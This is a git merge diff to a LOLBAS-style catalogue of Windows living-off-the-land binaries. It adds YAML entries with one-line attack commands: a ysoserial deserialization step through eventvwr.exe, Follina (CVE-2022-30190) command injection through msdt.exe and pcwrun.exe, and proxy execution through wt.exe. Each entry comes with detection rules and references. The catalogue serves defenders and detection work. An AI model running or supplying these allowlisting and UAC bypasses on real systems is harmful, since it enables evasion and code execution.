Merge pull request #1 from LOLBAS-Project/master

Merge LOLBAS-project to master
2025-07-31 22:52:51 +02:00 · 2022-11-14 12:08:58 +07:00
parent 0c0e242481 8452c1ca96
commit f3329c0d94
9 changed files with 161 additions and 10 deletions
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@@ -11,6 +11,13 @@ Commands:
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
+    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
+    Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
+    Category: Execute
+    Privileges: Administrator
+    MitreID: T1202
+    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
  - Path: C:\Windows\SysWOW64\eventvwr.exe
@@ -19,6 +26,7 @@ Code_Sample:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/registry_event/registry_event_uac_bypass_eventvwr.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_uac_bypass_eventvwr.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml
  - IOC: eventvwr.exe launching child process other than mmc.exe
@@ -26,8 +34,11 @@ Detection:
 Resources:
  - Link: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
  - Link: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
+  - Link: https://twitter.com/orange_8361/status/1518970259868626944
 Acknowledgement:
  - Person: Matt Nelson
    Handle: '@enigma0x3'
  - Person: Matt Graeber
    Handle: '@mattifestation'
+  - Person: Orange Tsai
+    Handle: '@orange_8361'
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@@ -18,18 +18,27 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
+    Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
+    Usecase: Execute code bypass Application allowlisting
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\Msdt.exe
  - Path: C:\Windows\SysWOW64\Msdt.exe
 Code_Sample:
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_msdt.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
 Resources:
  - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
  - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
  - Link: https://twitter.com/harr0ey/status/991338229952598016
+  - Link: https://twitter.com/nas_bench/status/1531944240271568896
 Acknowledgement:
-  - Person:
-    Handle:
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@@ -11,14 +11,22 @@ Commands:
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+  - Command: Pcwrun.exe /../../$(calc).exe
+    Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
+    Usecase: Proxy execution of binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
  - Path: C:\Windows\System32\pcwrun.exe
-Code_Sample:
-  - Code:
 Detection:
-  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_indirect_cmd_compatibility_assistant.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
 Resources:
  - Link: https://twitter.com/pabraeken/status/991335019833708544
+  - Link: https://twitter.com/nas_bench/status/1535663791362519040
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'
--- a/yml/OSBinaries/wt.yml
+++ b/yml/OSBinaries/wt.yml
@@ -0,0 +1,22 @@
+---
+Name: wt.exe
+Description: Windows Terminal
+Author: Nasreddine Bencherchali
+Created: 2022-07-27
+Commands:
+  - Command: wt.exe calc.exe
+    Description: Execute calc.exe via Windows Terminal.
+    Usecase: Use wt.exe as a proxy binary to evade defensive counter-measures
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 11
+Full_Path:
+  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/add077b8f54474cbfa859cf45a1ca62be5462b0f/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
+Resources:
+  - Link: https://twitter.com/nas_bench/status/1552100271668469761
+Acknowledgement:
+  - Person: Nasreddine Bencherchali
+    Handle: '@nas_bench'